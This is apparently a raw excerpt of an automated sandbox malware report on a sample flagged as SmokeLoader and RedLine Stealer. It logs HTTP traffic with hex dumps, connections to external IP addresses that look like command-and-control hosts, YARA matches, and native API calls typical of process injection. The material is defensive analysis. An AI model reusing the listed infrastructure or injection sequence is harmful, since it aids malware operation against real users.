63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000002.00000000.2106911547.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107728483.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107759847.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000002.00000000.2112085690.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2112085690.000000000C861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: C9F5.exe, C9F5.exe.2.drString found in binary or memory: http://www.oberhumer.com
      Source: explorer.exe, 00000002.00000000.2111355914.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000002.00000000.2105745637.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.2102045759.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000002.00000000.2111355914.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49766 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401538
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,0_2_00402FE9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401496
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401543
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401565
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401579
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040157C
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401538
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,4_2_00402FE9
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DE
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401496
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401543
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401565
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401579
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040157C
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,7_2_00007FF7D50A6900
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C5260 NtAllocateVirtualMemory,7_2_00007FF7D50C5260
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C5100 NtWriteVirtualMemory,7_2_00007FF7D50C5100
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C3F30 NtQueryInformationProcess,7_2_00007FF7D50C3F30
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C59D0 NtProtectVirtualMemory,7_2_00007FF7D50C59D0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C4FC0 NtReadVirtualMemory,7_2_00007FF7D50C4FC0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D507E8107_2_00007FF7D507E810
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50998307_2_00007FF7D5099830
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50BE4307_2_00007FF7D50BE430
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DC2307_2_00007FF7D50DC230
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5073E307_2_00007FF7D5073E30
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50BB0207_2_00007FF7D50BB020
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50614507_2_00007FF7D5061450
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50700507_2_00007FF7D5070050
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50BCC407_2_00007FF7D50BCC40
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B58607_2_00007FF7D50B5860
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50918807_2_00007FF7D5091880
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B3E807_2_00007FF7D50B3E80
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B20807_2_00007FF7D50B2080
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50AB6B07_2_00007FF7D50AB6B0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50E8AB07_2_00007FF7D50E8AB0
